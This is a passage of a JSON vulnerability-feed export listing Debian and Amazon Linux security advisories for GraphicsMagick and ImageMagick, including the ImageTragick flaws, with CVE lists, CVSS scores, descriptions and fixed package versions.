"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-31T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2022-08-05T05:17:57", "id": "OSV:DLA-1082-1", "href": "https://osv.dev/vulnerability/DLA-1082-1", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-08-10T07:07:30", "description": "\nSeveral vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\n\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFor the detailed security status of graphicsmagick please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/graphicsmagick](https://security-tracker.debian.org/tracker/graphicsmagick)\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10794", "CVE-2017-10799", "CVE-2017-10800", "CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11403", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-11722", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-14314", "CVE-2017-14504", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15277", "CVE-2017-15930", "CVE-2017-16352", "CVE-2017-16353", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2017-18219", "CVE-2017-18220", "CVE-2017-18229", "CVE-2017-18230", "CVE-2017-18231", "CVE-2018-5685", "CVE-2018-6799", "CVE-2018-9018"], "modified": "2022-08-10T07:07:29", "id": "OSV:DSA-4321-1", "href": "https://osv.dev/vulnerability/DSA-4321-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:13:34", "description": "\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code ([CVE-2016-3714](https://security-tracker.debian.org/tracker/CVE-2016-3714)), make\nHTTP GET or FTP requests ([CVE-2016-3718](https://security-tracker.debian.org/tracker/CVE-2016-3718)), or delete ([CVE-2016-3715](https://security-tracker.debian.org/tracker/CVE-2016-3715)),\nmove ([CVE-2016-3716](https://security-tracker.debian.org/tracker/CVE-2016-3716)), or read ([CVE-2016-3717](https://security-tracker.debian.org/tracker/CVE-2016-3717)) local files.\n\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the filename\nfor the insecure coders.\n\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\n\nWe recommend that you upgrade your imagemagick packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T00:00:00", "type": "osv", "title": "imagemagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5239"], "modified": "2022-07-21T05:54:27", "id": "OSV:DLA-486-1", "href": "https://osv.dev/vulnerability/DLA-486-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T08:25:43", "description": "\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n([CVE-2016-3714](https://security-tracker.debian.org/tracker/CVE-2016-3714)), make HTTP\nGET or FTP requests ([CVE-2016-3718](https://security-tracker.debian.org/tracker/CVE-2016-3718)),\nor delete ([CVE-2016-3715](https://security-tracker.debian.org/tracker/CVE-2016-3715)), move\n([CVE-2016-3716](https://security-tracker.debian.org/tracker/CVE-2016-3716)), or read\n([CVE-2016-3717](https://security-tracker.debian.org/tracker/CVE-2016-3717)) local files.\n\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\n\nWe recommend that you upgrade your imagemagick packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T00:00:00", "type": "osv", "title": "imagemagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5239"], "modified": "2022-07-21T05:49:05", "id": "OSV:DSA-3580-1", "href": "https://osv.dev/vulnerability/DSA-3580-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T05:18:05", "description": "\nA remote denial of service vulnerability has been discovered in\ngraphicsmagick, a collection of image processing tools and associated\nlibraries.\n\n\nA specially crafted file can be used to produce a heap-based buffer\noverflow and application crash by exploiting a defect in the\nAcquireCacheNexus function in magick/pixel\\_cache.c.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u14.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n**Note**: The previous graphicsmagick package inadvertently introduced a\ndependency on liblcms2-2. This version of the package returns to using\nliblcms1. If your system does not otherwise require liblcms2-2, you\nmay want to consider removing it following the graphicsmagick upgrade.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-10T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16669"], "modified": "2022-08-05T05:18:02", "id": "OSV:DLA-1168-1", "href": "https://osv.dev/vulnerability/DLA-1168-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:13:32", "description": "\nSeveral security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, \nexecute code \n([CVE-2016-3714](https://security-tracker.debian.org/tracker/CVE-2016-3714)), \nmake HTTP GET or FTP requests \n([CVE-2016-3718](https://security-tracker.debian.org/tracker/CVE-2016-3718)), \nor delete \n([CVE-2016-3715](https://security-tracker.debian.org/tracker/CVE-2016-3715)), \nmove\n([CVE-2016-3716](https://security-tracker.debian.org/tracker/CVE-2016-3716)), \nor read \n([CVE-2016-3717](https://security-tracker.debian.org/tracker/CVE-2016-3717)), \nlocal files.\n\n\nTo address these concerns the following changes have been made:\n\n\n1. Remove automatic detection/execution of MVG based on file header or\n file extension.\n2. Remove the ability to cause an input file to be deleted based on a\n filename specification.\n3. Improve the safety of delegates.mgk by removing gnuplot support,\n removing manual page support, and by adding -dSAFER to all\n ghostscript invocations.\n4. Sanity check the MVG image primitive filename argument to assure\n that \"magick:\" prefix strings will not be interpreted. Please note\n that this patch will break intentional uses of magick prefix\n strings in MVG and so some MVG scripts may fail. We will search\n for a more flexible solution.\n\n\nIn addition the following issues have been fixed:\n\n\n* [CVE-2015-8808](https://security-tracker.debian.org/tracker/CVE-2015-8808)\nAssure that GIF decoder does not use unitialized data and cause an\n out-of-bound read.\n* [CVE-2016-2317](https://security-tracker.debian.org/tracker/CVE-2016-2317) and\n [CVE-2016-2318](https://security-tracker.debian.org/tracker/CVE-2016-2318)\nVulnerabilities that allow to read or write outside memory bounds\n (heap, stack) as well as some null-pointer derreferences to cause a\n denial of service when parsing SVG files.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-21T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8808", "CVE-2016-2317", "CVE-2016-2318", "CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5239"], "modified": "2022-07-21T05:54:27", "id": "OSV:DLA-484-1", "href": "https://osv.dev/vulnerability/DLA-484-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2021-07-29T02:05:45", "description": "**Issue Overview:**\n\nA possible heap overflow was discovered in the EscapeParenthesis() function (CVE-2016-7447).\n\nVarious issues were found in the processing of SVG files in GraphicsMagick (CVE-2016-7446).\n\nThe TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449).\n\nThe Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service (CVE-2016-7448)\n\n \n**Affected Packages:** \n\n\nGraphicsMagick\n\n \n**Issue Correction:** \nRun _yum update GraphicsMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.25-1.9.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 GraphicsMagick-doc-1.3.25-1.9.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.25-1.9.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.25-1.9.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-12T17:00:00", "type": "amazon", "title": "Medium: GraphicsMagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449"], "modified": "2016-10-12T17:00:00", "id": "ALAS-2016-752", "href": "https://alas.aws.amazon.com/ALAS-2016-752.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-25T19:25:09", "description": "**Issue Overview:**\n\nMemory information disclosure in DescribeImage function in magick/describe.c \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file. There is an out-of-bounds buffer dereference because certain increments are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the ReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions, 0.5.0 and later, that use a different structure type. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application hang in the ReadBMPImage function (coders/bmp.c). Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26 creates a pixel cache before a successful read of a scanline, which allows remote attackers to cause a denial of service (resource consumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was found in the function ReadMNGImage in coders/png.c when a small MNG file has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage() function in coders/cmyk.c when processing multiple frames that have non-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function in magick/pixel_cache.c during writing of Magick Persistent Cache (MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8. (CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation. (CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to the AcquireCacheNexus function in magick/pixel_cache.c. (CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (application crash) during JNG reading via a zero-length color_image data structure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the WritePCLImage() function in coders/pcl.c during writes of monochrome images. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage() function in coders/rgb.c when processing multiple frames that have non-identical widths. (CVE-2017-11636)\n\n \n**Affected Packages:** \n\n\nGraphicsMagick\n\n \n**Issue Correction:** \nRun _yum update GraphicsMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.i686 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 GraphicsMagick-doc-1.3.28-1.12.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.28-1.12.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-devel-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-perl-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.x86_64 \n \u00a0\u00a0\u00a0 GraphicsMagick-1.3.28-1.12.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-07T21:35:00", "type": "amazon", "title": "Important: GraphicsMagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2018-5685"], "modified": "2018-03-08T22:17:00", "id": "ALAS-2018-966", "href": "https://alas.aws.amazon.com/ALAS-2018-966.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-25T19:28:23", "description": "**Issue Overview:**\n\nIt was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.\n\n \n**Affected Packages:** \n\n\nImageMagick\n\n \n**Issue Correction:** \nRun _yum update ImageMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 ImageMagick-doc-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-perl-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-c++-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-devel-6.7.8.9-13.19.amzn1.i686 \n \u00a0\u00a0\u00a0 ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 ImageMagick-6.7.8.9-13.19.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-c++-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-devel-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-doc-6.7.8.9-13.19.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ImageMagick-perl-6.7.8.9-13.19.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T11:00:00", "type": "amazon", "title": "Important: ImageMagick", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", 